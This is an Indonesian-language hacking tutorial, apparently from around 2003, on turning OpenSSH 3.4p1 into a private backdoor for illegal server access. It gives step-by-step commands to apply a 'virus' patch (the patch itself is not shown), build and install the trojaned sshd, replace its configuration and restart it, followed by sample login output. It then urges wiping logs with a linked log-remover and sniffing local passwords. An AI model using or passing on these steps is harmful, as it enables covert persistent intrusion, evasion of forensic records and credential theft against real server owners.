Seperti apa kata pepatah, apabila kalian bisa masuk melalui pintu yang sudah ada dan tanpa merubah apapun dari bentuk fisik pintu itu, maka lakukanlah. Kasus ini sama seperti kalau kita mencoba menginfeksi sebuah server untuk mendapatkan akses secara ilegal.
Dalam sebuah kasus, ketika dilakukan percobaan menginfeksi SSH, ada beberapa trojankit untuk itu, anggap saja kalian pernah memakai backdoor yang disebut dengan nama shv4.tar.gz (release oleh penturichi pada tahun 2002). Tool itu umum dan mungkin sangatlah mudah digunakan oleh para intruder untuk memudahkan mereka keluar masuk server (tentunya dengan fake login). Namun yang menjadi masalah disini adalah efek selanjutnya dari server itu sendiri, kadang yang terjadi adalah rusaknya library dan tidak berjalannya command command yang ada di /bin.
Apakah ada jalan lain? (yang aman tanpa membuka port seperti backdoor yang umum digunakan). Jawabnya ada, dan mari kita mencoba membahas sedikit walaupun penulis disini kurang pandai menjelaskan secara detail dan fokus.
Mencoba menginfeksi openSSH untuk dijadikan backdoor (private) tidak sesulit yang dibayangkan oleh berbagai khalayak/kelompok hacker di Indonesia (walaupun selama ini belum pernah penulis temui the real hacker di Indonesia ini).
Beberapa tool yang dibutuhkan adalah:
1. file openSSH-3.4p1 (http://www.openssh.com)
2. patch infeksi openSSH (terlampir dalam artikel)
Cara mengolahnya adalah:
Pertama yang dilakukan adalah extract file openSSH yang sudah terdownload, kemudian anda patch file injeksi kedalam direktori openSSH anda.
1. # cp ssh-virus.diff openssh-3.4p1/
2. # cd openssh-3.4p1/
3. # patch < ssh-virus.diff
Selanjutnya kita coba tools yang baru saja kita patch kedalam server sendiri dirumah anda. (kalau anda punya) bagaimana caranya?
Pertama adalah melakukan proses konfigurasi dengan cara
# ./configure atau dengan option yang lebih spesifik
# ./configure --prefix=/usr --sysconfdir=/etc/ssh
Kemudian melakukan make dan make install dengan cara
make ; make install
Setelah semua selesai dilakukan yang terakhir adalah menimpa file sshd_config dengan cara:
# mv -f sshd_config /etc/ssh/sshd_config
Selesai menimpa file sshd_config, dan ini adalah sebagai langkah final adalah restart SSH dengan cara
# ps -x | grep sshd
# kill -HUP (sshd pid)
/usr/sbin/sshd yang kita kill disini adalah sshd yang terbaru biasanya terletak pada baris paling atas. Sesudah kita lakukan kita cek apakah pintu masuk kita yang baru sudah berjalan dengan sukses apa tidak?
# telnet localhost 22
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.4p1
Nah setelah selesai, kita mencoba login kedalam server percobaan:
# ssh -l root localhost
root@localhost's password:
Last login: Mon Jul 28 14:12:22 2003 from bsd0.camne.net
OpenBSD 3.3 (GENERIC) #44: Sat Mar 29 13:22:05 MST 2003
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Wow.. pintu masuk kita yang baru berhasil kita jalankan.. Selanjutnya silahkan membersihkan beberapa log yang tertinggal dengan cara manual atau dengan memakai utilitas yang tersedia. Masih bingung mencari log remover? singgah ke http://sarang.kecoak.org/~scut/release/logremover.txt
Kemudian, apakah hanya sekedar mendapatkan akses ilegal dengan port 22? Tak adakah terlintas dalam pikiran anda untuk mencoba mengintip beberapa password didalam jaringan local dan keluarnya? bagaimana caranya? Be creative!